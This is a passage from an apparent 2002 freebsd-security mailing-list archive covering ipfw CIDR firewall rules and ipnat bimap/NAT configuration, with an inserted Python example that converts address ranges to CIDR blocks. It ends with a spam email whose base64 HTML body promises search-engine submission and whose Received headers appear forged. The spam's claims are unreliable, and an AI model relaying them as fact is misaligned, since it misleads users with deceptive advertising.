allow traffic from ANY to IP's in the range (XXX.146.160.0 - > 255.255.255.255) > > Is it more clear now? > > /Taz > Well, first try here to find the subnet numberings of the ranges that you want: http://www.telusplanet.net/public/sparkman/netcalc.htm I think they also have a more detailed explanation of the dotted decimal versus the number of bits (a.b.c.d/e) somewhere on the related pages if you're interested. Anywho, then take the resulting mask (a.b.c.d/e) and just write the rules as you normally would: ipfw add deny tcp from 1.2.3.0/24 to any The above would deny tcp from 1.2.3.0 through 1.2.3.255 to any. -- Derrick John Klise "I went into a general store, and they wouldn't sell me anything specific". 
-- Steven Wright To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 16:51: 0 2002 Delivered-To: freebsd-security@freebsd.org Received: from prox.centtech.com (moat2.centtech.com [206.196.95.21]) by hub.freebsd.org (Postfix) with ESMTP id D905737B40A for ; Thu, 9 May 2002 16:50:50 -0700 (PDT) Received: from pen.centtech.com (pen.centtech.com [10.177.178.33]) by prox.centtech.com (8.11.6/8.11.6) with ESMTP id g49HV8716626; Thu, 9 May 2002 12:31:08 -0500 (CDT) Received: from centtech.com (proton.centtech.com [10.177.173.77]) by pen.centtech.com (8.11.6+Sun/8.11.6) with ESMTP id g49HV7P01909; Thu, 9 May 2002 12:31:07 -0500 (CDT) Message-ID: <3CDAB25B.4B228C1B@centtech.com> Date: Thu, 09 May 2002 12:31:07 -0500 
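Derrick John Klise's reply above says to turn each address range into a.b.c.d/e blocks and then write the ipfw rules as usual. The following added example (not part of the original thread) does that split by hand for the blocked range in the question, matching on destination address as the clarified request asks; the first octet 10 stands in for the thread's XXX and is a constructed value, and the function names are hypothetical.

```python
import ipaddress


def range_to_cidrs(first, last):
    """Return the shortest list of CIDR blocks covering first..last inclusive."""
    lo = int(ipaddress.IPv4Address(first))
    hi = int(ipaddress.IPv4Address(last))
    if lo > hi:
        raise ValueError("range start is above range end")
    blocks = []
    while lo <= hi:
        # A block of 2**host_bits addresses must start on a multiple of its
        # own size, so the lowest set bit of lo caps the block size.
        host_bits = 32 if lo == 0 else (lo & -lo).bit_length() - 1
        # Shrink the block until it no longer runs past the end of the range.
        while lo + (1 << host_bits) - 1 > hi:
            host_bits -= 1
        blocks.append("%s/%d" % (ipaddress.IPv4Address(lo), 32 - host_bits))
        lo += 1 << host_bits
    return blocks


def ipfw_rules(action, first, last):
    """Build one ipfw rule per CIDR block, matching on destination address."""
    return ["ipfw add %s ip from any to %s" % (action, block)
            for block in range_to_cidrs(first, last)]


if __name__ == "__main__":
    # Constructed sample: 10 replaces the XXX octet used in the thread.
    for rule in ipfw_rules("deny", "10.128.0.0", "10.146.159.255"):
        print(rule)
    # ipfw stops at the first matching rule, so the deny rules go first and
    # a broad allow after them covers the two permitted ranges.
    print("ipfw add allow ip from any to any")
```

The blocked range does not fall on a single mask boundary, so it takes four blocks (/12, /15, /17 and /19) to cover it exactly.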
From: Eric Anderson Reply-To: anderson@centtech.com X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.4.2 i386) X-Accept-Language: en MIME-Version: 1.0 To: Nielsen Cc: freebsd-security@freebsd.org Subject: Re: ipnat and bimapping References: <3CDA988D.34E2148C@centtech.com> <20020509170045.5584B37B414@hub.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Ok, great (I love good software). So, my ipnat rules should look something like this:

bimap sis0 10.10.20.2/32 -> 24.24.24.1/32
map sis0 10.10.10.0/24 -> 24.24.24.1/32 portmap tcp/udp 40000:65000
map sis0 10.10.10.0/24 -> 24.24.24.1/32
map sis0 10.10.20.0/24 -> 24.24.24.1/32 portmap tcp/udp 40000:65000
map sis0 10.10.20.0/24 -> 24.24.24.1/32
map sis0 0.0.0.0/32 -> 0.0.0.0/32 proxy port 21 ftp/tcp

Does that look right? (assuming I want other hosts on the 10.10.20.0/24 net to be able to NAT through the gateway)

Eric

Nielsen wrote:
>
> Works for me. The two ranges also don't overlap. In my experience, however,
> even if they do ipnat is smart enough to handle certain overlapping subnets
> properly. I think last rule wins.
>
> ----- Original Message -----
> > Would bimap'ing the 24.24.24.1/32 address to 10.10.20.2/32 work? Or would that
> > screw up my nat'ing of the 10.10.10.0/24 net? I need all ports NOT nat'ed to
> > 10.10.10.0/24 to go to 10.10.20.2/32. Am I asking for trouble on the protected
> > net, or is this safe? Is bimap the right thing to use?
> >
> > How big is the gun that I am about to use to shoot myself in the foot?
> > > > Eric > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message -- ------------------------------------------------------------------ Eric Anderson Systems Administrator Centaur Technology You have my continuous partial attention ------------------------------------------------------------------ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 9 23:27:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from yahoo.com (cs.wako-giken.co.jp [210.233.0.10]) by hub.freebsd.org (Postfix) with SMTP id 9328237B43C for ; Thu, 9 May 2002 23:24:58 -0700 (PDT) Received: from 180.18.96.103 ([180.18.96.103]) by web13708.mail.yahoo.com with QMQP; Wed, 8 May 2002 12:18:21 -0000 Received: from [227.12.108.209] by rly-yk05.mx.aol.com with esmtp; Tue, 7 May 2002 01:15:57 -0300 Received: from [22.7.121.63] by rly-yk04.mx.aol.com with local; Sun, 5 May 2002 14:13:33 +1200 Reply-To: Message-ID: <95838AF7-F6A2-4F94-A1BE-B55B0EBE2AB0@gZXslue4> 
From: To: Subject: ebay users submit your site NzZe7E-ReFnT-VTmvHfM MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_00D2_13H34J4L.M2454Q76" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.2627 Importance: Normal Date: Thu, 9 May 2002 23:24:58 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ------=_NextPart_000_00D2_13H34J4L.M2454Q76 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: base64
ICAgICA8dGFibGUgd2lkdGg9IjQyNSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBh ZGRpbmc9IjAiPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAg ICAgICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iZmls ZTovLy9DJTdDL1dJTkRPV1MvRGVza3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhl aWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSI0MCIg dmFsaWduPSJ0b3AiPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9 IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4NCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzLzIu Z2lmIiB3aWR0aD0iMzAiIGhlaWdodD0iMjQiPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAg ICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAg ICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0 ZCB3aWR0aD0iMzgzIj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRhYmxlIHdpZHRo PSIxMDAlIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNCI+DQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICA8dGQ+PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjIiIGNvbG9yPSIjRkYwMDAwIj5S ZWNlaXZlIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0IGxlYXN0IDIwMCBs aW5raW5nIHNpdGVzLjwvZm9udD48Zm9udCBmYWNlPSJBcmlhbCIgc2l6ZT0iMiI+PGJyPg0KICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExpbmtpbmcgcG9wdWxhcml0eSBpcyBhIGh1 Z2UgZmFjdG9yIGluIHNlYXJjaCANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBl bmdpbmUgcmFua2luZ3MuPC9mb250PjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAg ICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0 aD0iMSIgYmdjb2xvcj0iIzAwMDBGRiI+PGltZyBzcmM9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMu Y29tL2ltYWdlcy90cmFuc3BhcmVudC5naWYiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvdGQ+DQog 
ICAgICAgICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAgIDwvdGFi bGU+DQogICAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICA8L3RyPg0K ICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgPHRkIGJhY2tncm91 bmQ9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMuY29tL2ltYWdlcy9ibHVlcGl4ZWwuZ2lmIj48aW1n IHNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdp ZHRoPSIxIiBoZWlnaHQ9IjEiPjwvdGQ+DQogICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAg ICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgPHRkPiANCiAgICAgICAgICAg ICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQyNSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIg Y2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAg ICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNy Yz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVza3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9 IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRo PSI0MCIgdmFsaWduPSJ0b3AiPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUg d2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1h Z2VzLzMuZ2lmIiB3aWR0aD0iMzAiIGhlaWdodD0iMjQiPjwvdGQ+DQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+ DQogICAgICAgICAgICAgICAgICAgICAgICAgIDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAg ICAgIDx0ZCB3aWR0aD0iMzgzIj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRhYmxl IHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNCI+ DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICA8dGQ+PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjIiPjxiPjxmb250IGNv bG9yPSIjRkYwMDAwIj5TYWxlcyANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBh dmFpbGFibGUgMjQgaG91cnMgYSBkYXkhPC9mb250PjwvYj48YnI+DQogICAgICAgICAgICAgICAg 
ICAgICAgICAgICAgICAgICAgU28geW91IGNhbiBzbGVlcCwgd2Ugd2lsbCB3YXRjaCB5b3VyIHNp dGUgZXZlcnkgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgMzAgbWludXRlcyAy NCBob3VycyBhIGRheS4gSWYgeW91ciBzaXRlIGlzIHRvIA0KICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgIGdvIGRvd24gd2Ugd2lsbCBub3RpZnkgeW91IHRocm91Z2ggYSBlbWFpbCBv ciANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhbiBlbWFpbCBwYWdlLiBZb3Ug d2lsbCBuZXZlciBoYXZlIHRvIHdvcnJ5IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIGFib3V0IGxvc2luZyBzYWxlcyE8L2ZvbnQ+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4NCiAg ICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg PHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJ TkRPV1MvRGVza3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90 ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAg PC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAgIDwv dHI+DQogICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICA8dGQgYmFj a2dyb3VuZD0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYi PjxpbWcgc3JjPSJodHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFnZXMvYmx1ZXBpeGVsLmdp ZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PGltZyANCnNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVy cy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvdGQ+DQog ICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAg ICAgICAgICAgICAgPHRkPiANCiAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQy NSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAg ICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRo PSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVz a3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAg ICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSI0MCIgdmFsaWduPSJ0b3AiPiANCiAgICAg 
ICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2Vs bHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0i aHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzLzQuZ2lmIiB3aWR0aD0iMzAiIGhlaWdo dD0iMjQiPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAgICAgICAgICAg IDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iMzgzIj4gDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgPHRhYmxlIHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNl bGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNCI+DQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+PGZvbnQgZmFj ZT0iQXJpYWwiIHNpemU9IjIiIGNvbG9yPSIjRkYwMDAwIj5XZSANCiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICBhcmUgYXZhaWxhYmxlIHZpYSBwaG9uZSBhbnl0aW1lLjwvZm9udD48 Zm9udCBmYWNlPSJBcmlhbCIgc2l6ZT0iMiI+PGJyPg0KICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgICAgIFlvdSBjYW4gYWx3YXlzIHJlYWNoIHVzIGlmIHRoZXJlIGFyZSBhbnkgcXVlc3Rp b25zIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9yIHByb2JsZW1zIHdpdGgg dGhlIHNlcnZpY2UuIFdlIGhhdmUgYSB0b2xsIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgIGZyZWUgdGVsZXBob25lIG51bWJlciB3aGVyZSB5b3UgYXJlIGFibGUgdG8gDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3BlYWsgd2l0aCBhIHJlcHJlc2VudGF0aXZl LjwvZm9udD48L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAgICAgICAgICAgICAg ICA8L3RkPg0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9IjEiIGJnY29sb3I9 IiMwMDAwRkYiPjxpbWcgc3JjPSJmaWxlOi8vL0MlN0MvV0lORE9XUy9EZXNrdG9wL2kvdHJhbnNw YXJlbnQuZ2lmIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L3RkPg0KICAgICAgICAgICAgICAgICAg ICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAgICAgICA8L3RhYmxlPg0KICAgICAgICAgICAg ICAgICAgICA8L3RkPg0KICAgICAgICAgICAgICAgICAgPC90cj4NCiAgICAgICAgICAgICAgICAg 
IDx0cj4gDQogICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0iaHR0cDovL3d3dy53ZWJj cmF3bGVycy5jb20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjxp bWcgc3JjPSJodHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFnZXMvYmx1ZXBpeGVsLmdpZiIg d2lkdGg9IjEiIGhlaWdodD0iMSI+PGltZyANCnNyYz0iaHR0cDovL3d3dy53ZWJjcmF3bGVycy5j b20vaW1hZ2VzL2JsdWVwaXhlbC5naWYiIHdpZHRoPSI0MjUiIGhlaWdodD0iMSI+PC90ZD4NCiAg ICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAg ICAgICAgICAgICA8dGQ+IA0KICAgICAgICAgICAgICAgICAgICAgIDx0YWJsZSB3aWR0aD0iNDI1 IiBib3JkZXI9IjAiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMCI+DQogICAgICAgICAg ICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9 IjEiIGJnY29sb3I9IiMwMDAwRkYiPjxpbWcgc3JjPSJmaWxlOi8vL0MlN0MvV0lORE9XUy9EZXNr dG9wL2kvdHJhbnNwYXJlbnQuZ2lmIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L3RkPg0KICAgICAg ICAgICAgICAgICAgICAgICAgICA8dGQgd2lkdGg9IjQwIiB2YWxpZ249InRvcCI+IA0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgIDx0YWJsZSB3aWR0aD0iMTAwJSIgYm9yZGVyPSIwIiBjZWxs c3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjQiPg0KICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkPjxpbWcgc3JjPSJo dHRwOi8vd3d3LndlYmNyYXdsZXJzLmNvbS9pbWFnZXMvNS5naWYiIHdpZHRoPSIzMCIgaGVpZ2h0 PSIyNCI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIzODMiPiANCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2Vs bHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD48Zm9udCBmYWNl PSJBcmlhbCIgc2l6ZT0iMiIgY29sb3I9IiNGRjAwMDAiPkhhdmUgDQogICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgdmlhYmlsaXR5IHRvIGFsbCBzZWFyY2ggZW5naW5lcy48L2ZvbnQ+ PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjIiPjxicj4NCiAgICAgICAgICAgICAgICAgICAgICAg 
ICAgICAgICAgICBTdWJtaXNzaW9uIGlzIHNlbnQgdG8gMTU1MCBzZWFyY2ggZW5naW5lcyBhbmQg DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZGlyZWN0b3JpZXMgZGFpbHkgaW4g b3JkZXIgdG8gYXZvaWQgaGF2aW5nIHlvdXIgDQogICAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgICAgc2l0ZSBkaXNtaXNzZWQgYnkgYW55IG9mIHRoZSBzZWFyY2ggZW5naW5lcy48L2ZvbnQ+ PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAg ICAgICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4N CiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZG Ij48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVza3RvcC9pL3RyYW5zcGFyZW50Lmdp ZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwv dHI+DQogICAgICAgICAgICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAg PC90ZD4NCiAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICA8dHI+IA0K ICAgICAgICAgICAgICAgICAgICA8dGQ+PGltZyBzcmM9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMu Y29tL2ltYWdlcy9ibHVlcGl4ZWwuZ2lmIiB3aWR0aD0iNDI1IiBoZWlnaHQ9IjEiPjwvdGQ+DQog ICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAg ICAgICAgICAgICAgPHRkPiANCiAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjQy NSIgYm9yZGVyPSIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjAiPg0KICAgICAgICAg ICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRo PSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iZmlsZTovLy9DJTdDL1dJTkRPV1MvRGVz a3RvcC9pL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhlaWdodD0iMSI+PC90ZD4NCiAgICAg ICAgICAgICAgICAgICAgICAgICAgPHRkIHdpZHRoPSI0MCIgdmFsaWduPSJ0b3AiPiANCiAgICAg ICAgICAgICAgICAgICAgICAgICAgICA8dGFibGUgd2lkdGg9IjEwMCUiIGJvcmRlcj0iMCIgY2Vs bHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSI0Ij4NCiAgICAgICAgICAgICAgICAgICAgICAgICAg ICAgIDx0cj4gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZD48aW1nIHNyYz0i aHR0cDovL3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzLzYuZ2lmIiB3aWR0aD0iMzAiIGhlaWdo dD0iMjQiPjwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8L3RyPg0KICAgICAg 
ICAgICAgICAgICAgICAgICAgICAgIDwvdGFibGU+DQogICAgICAgICAgICAgICAgICAgICAgICAg IDwvdGQ+DQogICAgICAgICAgICAgICAgICAgICAgICAgIDx0ZCB3aWR0aD0iMzgzIj4gDQogICAg ICAgICAgICAgICAgICAgICAgICAgICAgPHRhYmxlIHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNl bGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iNCI+DQogICAgICAgICAgICAgICAgICAgICAgICAg ICAgICA8dHI+IA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA8dGQ+PGZvbnQgZmFj ZT0iQXJpYWwiIHNpemU9IjIiPjxiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5TaXRlIA0KICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFByb2JsZW1zPzwvZm9udD48YnI+DQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9iPk5vIG5lZWQgdG8gd29ycnkuIE91ciBNZW1i ZXJzIGhhdmUgYWNjZXNzIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGEg U2l0ZSBUcmFjZXIgdGhhdCBpcyB1cGRhdGVkIGRhaWx5IHdoaWNoIA0KICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIHNob3cgdGhlIHNpdGWScyBmdW5jdGlvbmluZyBhbmQgaWYgdGhl cmUgYXJlIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFueSBwcm9ibGVtcyB3 aWxsIHNob3cgeW91IGhvdyB0byByZXBhaXIgdGhlbS48L2ZvbnQ+PC90ZD4NCiAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgPC90 YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAgICAgICAgICAg ICAgICAgICAgPHRkIHdpZHRoPSIxIiBiZ2NvbG9yPSIjMDAwMEZGIj48aW1nIHNyYz0iaHR0cDov L3d3dy53ZWJjcmF3bGVycy5jb20vaW1hZ2VzL3RyYW5zcGFyZW50LmdpZiIgd2lkdGg9IjEiIGhl aWdodD0iMSI+PC90ZD4NCiAgICAgICAgICAgICAgICAgICAgICAgIDwvdHI+DQogICAgICAgICAg ICAgICAgICAgICAgPC90YWJsZT4NCiAgICAgICAgICAgICAgICAgICAgPC90ZD4NCiAgICAgICAg ICAgICAgICAgIDwvdHI+DQogICAgICAgICAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgICAg ICAgICA8dGQ+PGltZyBzcmM9Imh0dHA6Ly93d3cud2ViY3Jhd2xlcnMuY29tL2ltYWdlcy9ibHVl cGl4ZWwuZ2lmIiB3aWR0aD0iNDI1IiBoZWlnaHQ9IjEiPjwvdGQ+DQogICAgICAgICAgICAgICAg ICA8L3RyPg0KICAgICAgICAgICAgICAgICAgPHRyPiANCiAgICAgICAgICAgICAgICAgICAgPHRk 